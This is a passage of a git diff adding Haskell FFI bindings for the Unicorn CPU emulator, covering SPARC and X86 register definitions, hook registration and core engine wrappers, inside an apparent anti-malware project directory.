UC_MIPS_REG_30 as Reg30g + , UC_MIPS_REG_31 as Reg31 + } + omit ( UC_MIPS_REG_INVALID + , UC_MIPS_REG_ENDING + ) + with prefix = "UC_MIPS_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Sparc.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Sparc.chs new file mode 100644 index 0000000..e54262b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Sparc.chs @@ -0,0 +1,32 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Sparc +Description : Definitions for the SPARC architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the SPARC architecture. +-} +module Unicorn.CPU.Sparc + ( + Register(..) + ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | SPARC registers. +{# enum uc_sparc_reg as Register + { underscoreToCase } + omit (UC_SPARC_REG_INVALID + , UC_SPARC_REG_ENDING + ) + with prefix = "UC_SPARC_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/X86.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/X86.chs new file mode 100644 index 0000000..56608c1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/X86.chs @@ -0,0 +1,70 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.X86 +Description : Definitions for the X86 architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the X86 architecture. +-} +module Unicorn.CPU.X86 + ( + Mmr(..) + , Register(..) + , Instruction(..) + ) where + +import Control.Applicative +import Data.Word +import Foreign + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | Memory-managemen Register for instructions IDTR, GDTR, LDTR, TR. +-- Borrow from SegmentCache in qemu/target-i386/cpu.h +data Mmr = Mmr + { mmrSelector :: Word16 -- ^ Not used by GDTR and IDTR + , mmrBase :: Word64 -- ^ Handle 32 or 64 bit CPUs + , mmrLimit :: Word32 + , mmrFlags :: Word32 -- ^ Not used by GDTR and IDTR + } + +instance Storable Mmr where + sizeOf _ = {# sizeof uc_x86_mmr #} + alignment _ = {# alignof uc_x86_mmr #} + peek p = Mmr <$> liftA fromIntegral ({# get uc_x86_mmr->selector #} p) + <*> liftA fromIntegral ({# get uc_x86_mmr->base #} p) + <*> liftA fromIntegral ({# get uc_x86_mmr->limit #} p) + <*> liftA fromIntegral ({# get uc_x86_mmr->flags #} p) + poke p mmr = do + {# set uc_x86_mmr.selector #} p (fromIntegral $ mmrSelector mmr) + {# set uc_x86_mmr.base #} p (fromIntegral $ mmrBase mmr) + {# set uc_x86_mmr.limit #} p (fromIntegral $ mmrLimit mmr) + {# set uc_x86_mmr.flags #} p (fromIntegral $ mmrFlags mmr) + +-- | X86 registers. +{# enum uc_x86_reg as Register + { underscoreToCase } + omit ( UC_X86_REG_INVALID + , UC_X86_REG_ENDING + ) + with prefix = "UC_X86_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register + +-- | X86 instructions. +{# enum uc_x86_insn as Instruction + { underscoreToCase } + omit ( UC_X86_INS_INVALID + , UC_X86_INS_ENDING + ) + with prefix = "UC_X86_INS_" + deriving (Show, Eq, Bounded) +#} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Hook.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Hook.hs new file mode 100644 index 0000000..0af53fd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Hook.hs @@ -0,0 +1,216 @@ +{-| +Module : Unicorn.Hook +Description : Unicorn hooks. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Insert hook points into the Unicorn emulator engine. +-} +module Unicorn.Hook + ( -- * Hook types + Hook + , MemoryHookType(..) + , MemoryEventHookType(..) + , MemoryAccess(..) + + -- * Hook callbacks + , CodeHook + , InterruptHook + , BlockHook + , InHook + , OutHook + , SyscallHook + , MemoryHook + , MemoryReadHook + , MemoryWriteHook + , MemoryEventHook + + -- * Hook callback management + , codeHookAdd + , interruptHookAdd + , blockHookAdd + , inHookAdd + , outHookAdd + , syscallHookAdd + , memoryHookAdd + , memoryEventHookAdd + , hookDel + ) where + +import Control.Monad +import Control.Monad.Trans.Class +import Control.Monad.Trans.Except (ExceptT (..), throwE) +import Foreign + +import Unicorn.Internal.Core +import Unicorn.Internal.Hook +import qualified Unicorn.CPU.X86 as X86 + +------------------------------------------------------------------------------- +-- Hook callback management (registration and deletion) +------------------------------------------------------------------------------- + +-- | Register a callback for a code hook event. +codeHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> CodeHook a -- ^ Code hook callback + -> a -- ^ User-defined data. This will be passed to + -- the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' + -- on failure +codeHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalCodeHook callback + getResult $ ucHookAdd uc HookCode funPtr userDataPtr begin end + +-- | Register a callback for an interrupt hook event. +interruptHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> InterruptHook a -- ^ Interrupt callback + -> a -- ^ User-defined data. This will be passed + -- to the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or 'Error' + -- on failure +interruptHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalInterruptHook callback + getResult $ ucHookAdd uc HookIntr funPtr userDataPtr begin end + +-- | Register a callback for a block hook event. +blockHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> BlockHook a -- ^ Block callback + -> a -- ^ User-defined data. This will be passed to + -- the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' + -- on failure +blockHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalBlockHook callback + getResult $ ucHookAdd uc HookBlock funPtr userDataPtr begin end + +-- | Register a callback for an IN instruction hook event (X86). +inHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> InHook a -- ^ IN instruction callback + -> a -- ^ User-defined data. This will be passed to the + -- callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' on + -- failure +inHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalInHook callback + getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end + X86.In + +-- | Register a callback for an OUT instruction hook event (X86). +outHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> OutHook a -- ^ OUT instruction callback + -> a -- ^ User-defined data. This will be passed to the + -- callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' on + -- failure +outHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalOutHook callback + getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end + X86.Out + +-- | Register a callback for a SYSCALL instruction hook event (X86). +syscallHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> SyscallHook a -- ^ SYSCALL instruction callback + -> a -- ^ User-defined data. This will be passed to + -- the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' + -- on failure +syscallHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalSyscallHook callback + getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end + X86.Syscall + +-- | Register a callback for a valid memory access event. +memoryHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> MemoryHookType -- ^ A valid memory access (e.g. read, write, + -- etc.) to trigger the callback on + -> MemoryHook a -- ^ Memory access callback + -> a -- ^ User-defined data. This will be passed to + -- the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' + -- on failure +memoryHookAdd uc memHookType callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalMemoryHook callback + getResult $ ucHookAdd uc memHookType funPtr userDataPtr begin end + +-- | Register a callback for an invalid memory access event. +memoryEventHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> MemoryEventHookType -- ^ An invalid memory access (e.g. + -- read, write, etc.) to trigger + -- the callback on + -> MemoryEventHook a -- ^ Invalid memory access callback + -> a -- ^ User-defined data. This will + -- be passed to the callback + -- function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or + -- an 'Error' on failure +memoryEventHookAdd uc memEventHookType callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalMemoryEventHook callback + getResult $ ucHookAdd uc memEventHookType funPtr userDataPtr begin end + +-- | Unregister (remove) a hook callback. +hookDel :: Engine -- ^ 'Unicorn' engine handle + -> Hook -- ^ 'Hook' handle + -> Emulator () -- ^ 'ErrOk' on success, or other value on failure +hookDel uc hook = do + err <- lift $ ucHookDel uc hook + if err == ErrOk then + pure () + else + throwE err + +------------------------------------------------------------------------------- +-- Helper functions +------------------------------------------------------------------------------- + +-- Takes the tuple returned by `ucHookAdd`, an IO (Error, Hook), and +-- returns either a `Right Hook` if no error occurred or a `Left Error` if an +-- error occurred +getResult :: IO (Error, Hook) + -> IO (Either Error Hook) +getResult = + liftM (uncurry checkResult) + where checkResult err hook = + if err == ErrOk then + Right hook + else + Left err diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Core.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Core.chs new file mode 100644 index 0000000..762669d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Core.chs @@ -0,0 +1,54 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.Internal.Core +Description : Core Unicorn components. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Defines core Unicorn components. + +This module should not be directly imported; it is only exposed because of the +way cabal handles ordering of chs files. +-} +module Unicorn.Internal.Core where + +import Control.Monad +import Control.Monad.Trans.Except (ExceptT) +import Foreign + +{# context lib = "unicorn" #} + +#include +#include "unicorn_wrapper.h" + +-- | The Unicorn engine. +{# pointer *uc_engine as Engine + foreign finalizer uc_close_wrapper as close + newtype +#} + +-- | A pointer to a Unicorn engine. +{# pointer *uc_engine as EnginePtr -> Engine #} + +-- | Make a new Unicorn engine out of an engine pointer. The returned Unicorn +-- engine will automatically call 'uc_close_wrapper' when it goes out of scope. +mkEngine :: EnginePtr + -> IO Engine +mkEngine ptr = + liftM Engine (newForeignPtr close ptr) + +-- | Errors encountered by the Unicorn API. These values are returned by +-- 'errno'. +{# enum uc_err as Error + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | The emulator runs in the IO monad and allows for the handling of errors +-- "under the hood". +type Emulator a = ExceptT Error IO a + +-- | An architecture-dependent register. +class Enum a => Reg a diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Hook.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Hook.chs new file mode 100644 index 0000000..261adf1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Hook.chs @@ -0,0 +1,445 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.Internal.Hook +Description : Unicorn hooks. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Low-level bindings for inserting hook points into the Unicorn emulator engine. + +This module should not be directly imported; it is only exposed because of the +way cabal handles ordering of chs files. +-} +module Unicorn.Internal.Hook + ( -- * Types + Hook + , HookType(..) + , MemoryHookType(..) + , MemoryEventHookType(..) + , MemoryAccess(..) + + -- * Hook callback bindings + , CodeHook + , InterruptHook + , BlockHook + , InHook + , OutHook + , SyscallHook + , MemoryHook + , MemoryReadHook + , MemoryWriteHook + , MemoryEventHook + + -- * Hook marshallin + , marshalCodeHook + , marshalInterruptHook + , marshalBlockHook + , marshalInHook + , marshalOutHook + , marshalSyscallHook + , marshalMemoryHook + , marshalMemoryReadHook + , marshalMemoryWriteHook + , marshalMemoryEventHook + + -- * Hook registration and deletion bindings + , ucHookAdd + , ucInsnHookAdd + , ucHookDel + ) where + +import Control.Monad +import Foreign + +import Unicorn.Internal.Util + +{# import Unicorn.Internal.Core #} +{# import Unicorn.CPU.X86 #} + +{# context lib = "unicorn" #} + +#include +#include "unicorn_wrapper.h" + +------------------------------------------------------------------------------- +-- Types +------------------------------------------------------------------------------- + +-- When we pass a Unicorn engine to a hook callback, we do not want this engine +-- object to be freed automatically when the callback returns (which is what +-- would typically occur when using a ForeignPtr), because we want to continue +-- using the Unicorn engine outside the callback. To avoid this, +-- unicorn_wrapper.h provides a dummy "close" function that does nothing. When +-- we go to create a Unicorn engine to pass to a callback, we use a pointer to +-- this dummy close function as the finalizer pointer. When the callback +-- returns, the Unicorn engine remains untouched! +-- +-- XX Is there a better way to do this? +foreign import ccall "&uc_close_dummy" + closeDummy :: FunPtr (EnginePtr -> IO ()) + +mkEngineNC :: EnginePtr + -> IO Engine +mkEngineNC ptr = + liftM Engine (newForeignPtr closeDummy ptr) + +-- | A Unicorn hook. +type Hook = {# type uc_hook #} + +-- Hook types. These are used internally within this module by the callback +-- registration functions and are not exposed to the user. +-- +-- Note that the both valid and invalid memory access hooks are omitted from +-- this enum (and are exposed to the user). +{# enum uc_hook_type as HookType + { underscoreToCase } + omit ( UC_HOOK_MEM_READ_UNMAPPED + , UC_HOOK_MEM_WRITE_UNMAPPED + , UC_HOOK_MEM_FETCH_UNMAPPED + , UC_HOOK_MEM_READ_PROT + , UC_HOOK_MEM_WRITE_PROT + , UC_HOOK_MEM_FETCH_PROT + , UC_HOOK_MEM_READ + , UC_HOOK_MEM_WRITE + , UC_HOOK_MEM_FETCH + , UC_HOOK_MEM_READ_AFTER + ) + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Memory hook types (for valid memory accesses). +{# enum uc_hook_type as MemoryHookType + { underscoreToCase } + omit ( UC_HOOK_INTR + , UC_HOOK_INSN + , UC_HOOK_CODE + , UC_HOOK_BLOCK + , UC_HOOK_MEM_READ_UNMAPPED + , UC_HOOK_MEM_WRITE_UNMAPPED + , UC_HOOK_MEM_FETCH_UNMAPPED + , UC_HOOK_MEM_READ_PROT + , UC_HOOK_MEM_WRITE_PROT + , UC_HOOK_MEM_FETCH_PROT + ) + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Memory event hook types (for invalid memory accesses). +{# enum uc_hook_type as MemoryEventHookType + { underscoreToCase } + omit ( UC_HOOK_INTR + , UC_HOOK_INSN + , UC_HOOK_CODE + , UC_HOOK_BLOCK + , UC_HOOK_MEM_READ + , UC_HOOK_MEM_WRITE + , UC_HOOK_MEM_FETCH + , UC_HOOK_MEM_READ_AFTER + ) + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Unify the hook types with a type class +class Enum a => HookTypeC a + +instance HookTypeC HookType +instance HookTypeC MemoryHookType +instance HookTypeC MemoryEventHookType + +-- | Memory access. +{# enum uc_mem_type as MemoryAccess + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +------------------------------------------------------------------------------- +-- Hook callbacks +------------------------------------------------------------------------------- + +-- | Callback function for tracing code. +type CodeHook a = Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Addres where the code is being executed + -> Maybe Int -- ^ Size of machine instruction(s) being + -- executed, or 'Nothing' when size is unknown + -> a -- ^ User data passed to tracing APIs + -> IO () + +type CCodeHook = EnginePtr -> Word64 -> Word32 -> Ptr () -> IO () + +foreign import ccall "wrapper" + mkCodeHook :: CCodeHook + -> IO {# type uc_cb_hookcode_t #} + +marshalCodeHook :: Storable a + => CodeHook a + -> IO {# type uc_cb_hookcode_t #} +marshalCodeHook codeHook = + mkCodeHook $ \ucPtr address size userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + let maybeSize = if size == 0 then Nothing + else Just $ fromIntegral size + codeHook uc address maybeSize userData + +-- | Callback function for tracing interrupts. +type InterruptHook a = Engine -- ^ 'Unicorn' engine handle + -> Int -- ^ Interrupt number + -> a -- ^ User data passed to tracing APIs + -> IO () + +type CInterruptHook = EnginePtr -> Word32 -> Ptr () -> IO () + +foreign import ccall "wrapper" + mkInterruptHook :: CInterruptHook -> IO {# type uc_cb_hookintr_t #} + +marshalInterruptHook :: Storable a + => InterruptHook a + -> IO {# type uc_cb_hookintr_t #} +marshalInterruptHook interruptHook = + mkInterruptHook $ \ucPtr intNo userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + interruptHook uc (fromIntegral intNo) userData + +-- | Callback function for tracing blocks. +type BlockHook a = CodeHook a + +marshalBlockHook :: Storable a + => BlockHook a + -> IO {# type uc_cb_hookcode_t #} +marshalBlockHook = + marshalCodeHook + +-- | Callback function for tracing IN instructions (X86). +type InHook a = Engine -- ^ 'Unicorn' engine handle + -> Int -- ^ Port number + -> Int -- ^ Data size (1/2/4) to be read from this port + -> a -- ^ User data passed to tracing APIs + -> IO Word32 -- ^ The data read from the port + +type CInHook = EnginePtr -> Word32 -> Int32 -> Ptr () -> IO Word32 + +foreign import ccall "wrapper" + mkInHook :: CInHook -> IO {# type uc_cb_insn_in_t #} + +marshalInHook :: Storable a + => InHook a + -> IO {# type uc_cb_insn_in_t #} +marshalInHook inHook = + mkInHook $ \ucPtr port size userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + inHook uc (fromIntegral port) (fromIntegral size) userData + +-- | Callback function for tracing OUT instructions (X86). +type OutHook a = Engine -- ^ 'Unicorn' engine handle + -> Int -- ^ Port number + -> Int -- ^ Data size (1/2/4) to be written to this port + -> Int -- ^ Data value to be written to this port + -> a -- ^ User data passed to tracing APIs + -> IO () + +type COutHook = EnginePtr -> Word32 -> Int32 -> Word32 -> Ptr () -> IO () + +foreign import ccall "wrapper" + mkOutHook :: COutHook + -> IO {# type uc_cb_insn_out_t #} + +marshalOutHook :: Storable a + => OutHook a + -> IO {# type uc_cb_insn_out_t #} +marshalOutHook outHook = + mkOutHook $ \ucPtr port size value userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + outHook uc (fromIntegral port) (fromIntegral size) (fromIntegral value) + userData + +-- | Callback function for tracing SYSCALL instructions (X86). +type SyscallHook a = Engine -- ^ 'Unicorn' engine handle + -> a -- ^ User data passed to tracing APIs + -> IO () + +type CSyscallHook = Ptr () -> Ptr () -> IO () + +foreign import ccall "wrapper" + mkSyscallHook :: CSyscallHook + -> IO {# type uc_cb_insn_syscall_t #} + +marshalSyscallHook :: Storable a + => SyscallHook a + -> IO {# type uc_cb_insn_syscall_t #} +marshalSyscallHook syscallHook = + mkSyscallHook $ \ucPtr userDataPtr -> do + uc <- mkEngineNC $ castPtr ucPtr + userData <- castPtrAndPeek userDataPtr + syscallHook uc userData + +-- | Callback function for hooking memory operations. +type MemoryHook a = Engine -- ^ 'Unicorn' engine handle + -> MemoryAccess -- ^ Memory access; read or write + -> Word64 -- ^ Address where the code is being + -- executed + -> Int -- ^ Size of data being read or written + -> Maybe Int -- ^ Value of data being wrriten, or + -- 'Nothing' if read + -> a -- ^ User data passed to tracing APIs + -> IO () + +type CMemoryHook = EnginePtr + -> Int32 + -> Word64 + -> Int32 + -> Int64 + -> Ptr () + -> IO () + +foreign import ccall "wrapper" + mkMemoryHook :: CMemoryHook + -> IO {# type uc_cb_hookmem_t #} + +marshalMemoryHook :: Storable a + => MemoryHook a + -> IO {# type uc_cb_hookmem_t #} +marshalMemoryHook memoryHook = + mkMemoryHook $ \ucPtr memAccessI address size value userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + let memAccess = toMemAccess memAccessI + maybeValue = case memAccess of + MemRead -> Nothing + MemWrite -> Just $ fromIntegral value + _ -> error "Invalid memory access" + memoryHook uc memAccess address (fromIntegral size) maybeValue userData + +-- | Callback function for hooking memory reads. +type MemoryReadHook a = Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Address where the code is being executed + -> Int -- ^ Size of data being read + -> a -- ^ User data passed to tracing APIs + -> IO () + +marshalMemoryReadHook :: Storable a + => MemoryReadHook a + -> IO {# type uc_cb_hookmem_t #} +marshalMemoryReadHook memoryReadHook = + mkMemoryHook $ \ucPtr _ address size _ userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + memoryReadHook uc address (fromIntegral size) userData + +-- | Callback function for hooking memory writes. +type MemoryWriteHook a = Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Address where the code is being + -- executed + -> Int -- ^ Size of data being written + -> Int -- ^ Value of data being written + -> a -- ^ User data passed to tracing APIs + -> IO () + +marshalMemoryWriteHook :: Storable a + => MemoryWriteHook a + -> IO {# type uc_cb_hookmem_t #} +marshalMemoryWriteHook memoryWriteHook = + mkMemoryHook $ \ucPtr _ address size value userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + memoryWriteHook uc address (fromIntegral size) (fromIntegral value) + userData + +-- | Callback function for handling invalid memory access events. +type MemoryEventHook a = Engine -- ^ 'Unicorn' engine handle + -> MemoryAccess -- ^ Memory access; read or write + -> Word64 -- ^ Address where the code is being + -- executed + -> Int -- ^ Size of data being read or written + -> Maybe Int -- ^ Value of data being written, or + -- 'Nothing' if read + -> a -- ^ User data passed to tracing APIs + -> IO Bool -- ^ Return 'True' to continue, or + -- 'False' to stop the program (due to + -- invalid memory) + +type CMemoryEventHook = EnginePtr + -> Int32 + -> Word64 + -> Int32 + -> Int64 + -> Ptr () + -> IO Int32 + +foreign import ccall "wrapper" + mkMemoryEventHook :: CMemoryEventHook + -> IO {# type uc_cb_eventmem_t #} + +marshalMemoryEventHook :: Storable a + => MemoryEventHook a + -> IO {# type uc_cb_eventmem_t #} +marshalMemoryEventHook eventMemoryHook = + mkMemoryEventHook $ \ucPtr memAccessI address size value userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + let memAccess = toMemAccess memAccessI + maybeValue = case memAccess of + MemReadUnmapped -> Nothing + MemReadProt -> Nothing + MemWriteUnmapped -> Just $ fromIntegral value + MemWriteProt -> Just $ fromIntegral value + _ -> error "Invalid memory access" + res <- eventMemoryHook uc memAccess address (fromIntegral size) + maybeValue userData + return $ boolToInt res + where boolToInt True = 1 + boolToInt False = 0 + + +------------------------------------------------------------------------------- +-- Hook callback registration (and deletion) +------------------------------------------------------------------------------- + +{# fun variadic uc_hook_add as ucHookAdd + `HookTypeC h' => + { `Engine' + , alloca- `Hook' peek* + , enumToNum `h' + , castFunPtrToPtr `FunPtr b' + , castPtr `Ptr a' + , `Word64' + , `Word64' + } -> `Error' +#} + +{# fun variadic uc_hook_add[int] as ucInsnHookAdd + `HookTypeC h' => + { `Engine' + , alloca- `Hook' peek* + , enumToNum `h' + , castFunPtrToPtr `FunPtr b' + , castPtr `Ptr a' + , `Word64' + , `Word64' + , enumToNum `Instruction' + } -> `Error' +#} + +-- | Unregister (remove) a hook callback. +{# fun uc_hook_del as ^ + { `Engine' + , fromIntegral `Hook' + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Helper functions +------------------------------------------------------------------------------- + +toMemAccess :: Integral a + => a + -> MemoryAccess +toMemAccess = + toEnum . fromIntegral diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Unicorn.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Unicorn.chs new file mode 100644 index 0000000..db97552 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Unicorn.chs @@ -0,0 +1,350 @@ +{-# LANGUAGE ForeignFunctionInterface #-} +{-# LANGUAGE ScopedTypeVariables #-} + +{-| +Module : Unicorn.Internal.Unicorn +Description : The Unicorn CPU emulator. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Low-level bindings for the Unicorn CPU emulator framework. + +This module should not be directly imported; it is only exposed because of the +way cabal handles ordering of chs files. +-} +module Unicorn.Internal.Unicorn + ( -- * Types + Architecture(..) + , Mode(..) + , MemoryPermission(..) + , MemoryRegion(..) + , QueryType(..) + , Context + + -- * Function bindings + , ucOpen + , ucQuery + , ucEmuStart + , ucEmuStop + , ucRegWrite + , ucRegRead + , ucRegWriteBatch + , ucRegReadBatch + , ucMemWrite + , ucMemRead + , ucMemMap + , ucMemUnmap + , ucMemProtect + , ucMemRegions + , mkContext + , ucContextAlloc + , ucContextSave + , ucContextRestore + , ucVersion + , ucErrno + , ucStrerror + ) where + +import Control.Applicative +import Control.Monad +import Data.ByteString (ByteString, useAsCStringLen) +import Foreign +import Foreign.C +import Prelude hiding (until) + +import Unicorn.Internal.Util + +{# import Unicorn.Internal.Core #} + +{# context lib = "unicorn" #} + +#include +#include "unicorn_wrapper.h" + +------------------------------------------------------------------------------- +-- Types +------------------------------------------------------------------------------- + +-- | CPU architecture. +{# enum uc_arch as Architecture + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | CPU hardware mode. +{# enum uc_mode as Mode + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Memory permissions. +{# enum uc_prot as MemoryPermission + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Memory region mapped by 'memMap'. Retrieve the list of memory regions with +-- 'memRegions'. +data MemoryRegion = MemoryRegion + { + mrBegin :: Word64 -- ^ Begin address of the region (inclusive) + , mrEnd :: Word64 -- ^ End address of the region (inclusive) + , mrPerms :: [MemoryPermission] -- ^ Memory permissions of the region + } + +instance Storable MemoryRegion where + sizeOf _ = {# sizeof uc_mem_region #} + alignment _ = {# alignof uc_mem_region #} + peek p = MemoryRegion + <$> liftA fromIntegral ({# get uc_mem_region->begin #} p) + <*> liftA fromIntegral ({# get uc_mem_region->end #} p) + <*> liftA expandMemPerms ({# get uc_mem_region->perms #} p) + poke p mr = do + {# set uc_mem_region.begin #} p (fromIntegral $ mrBegin mr) + {# set uc_mem_region.end #} p (fromIntegral $ mrEnd mr) + {# set uc_mem_region.perms #} p (combineEnums $ mrPerms mr) + +-- | A pointer to a memory region. +{# pointer *uc_mem_region as MemoryRegionPtr -> MemoryRegion #} + +-- | Query types for the 'query' API. +{# enum uc_query_type as QueryType + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Opaque storage for CPU context, used with the context functions. +{# pointer *uc_context as Context + foreign finalizer uc_free_wrapper as memFree + newtype +#} + +-- | A pointer to a CPU context. +{# pointer *uc_context as ContextPtr -> Context #} + +-- | Make a CPU context out of a context pointer. The returned CPU context will +-- automatically call 'uc_free' when it goes out of scope. +mkContext :: ContextPtr + -> IO Context +mkContext ptr = + liftM Context (newForeignPtr memFree ptr) + +------------------------------------------------------------------------------- +-- Emulator control +------------------------------------------------------------------------------- + +{# fun uc_open as ^ + { `Architecture' + , combineEnums `[Mode]' + , alloca- `EnginePtr' peek* + } -> `Error' +#} + +{# fun uc_query as ^ + { `Engine' + , `QueryType' + , alloca- `Int' castPtrAndPeek* + } -> `Error' +#} + +{# fun uc_emu_start as ^ + { `Engine' + , `Word64' + , `Word64' + , `Int' + , `Int' + } -> `Error' +#} + +{# fun uc_emu_stop as ^ + { `Engine' + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Register operations +------------------------------------------------------------------------------- + +{# fun uc_reg_write_wrapper as ucRegWrite + `Reg r' => + { `Engine' + , enumToNum `r' + , withIntegral* `Int64' + } -> `Error' +#} + +{# fun uc_reg_read_wrapper as ucRegRead + `Reg r' => + { `Engine' + , enumToNum `r' + , alloca- `Int64' castPtrAndPeek* + } -> `Error' +#} + +{# fun uc_reg_write_batch_wrapper as ucRegWriteBatch + `Reg r' => + { `Engine' + , withEnums* `[r]' + , integralListToArray* `[Int64]' + , `Int' + } -> `Error' +#} + +{# fun uc_reg_read_batch_wrapper as ucRegReadBatch + `Reg r' => + { `Engine' + , withEnums* `[r]' + , castPtr `Ptr Int64' + , `Int' + } -> `Error' +#} + +------------------------------------------------------------------------------- +-- Memory operations +------------------------------------------------------------------------------- + +{# fun uc_mem_write as ^ + { `Engine' + , `Word64' + , withByteStringLen* `ByteString'& + } -> `Error' +#} + +{# fun uc_mem_read as ^ + { `Engine' + , `Word64' + , castPtr `Ptr Word8' + , `Int' + } -> `Error' +#} + +{# fun uc_mem_map as ^ + { `Engine' + , `Word64' 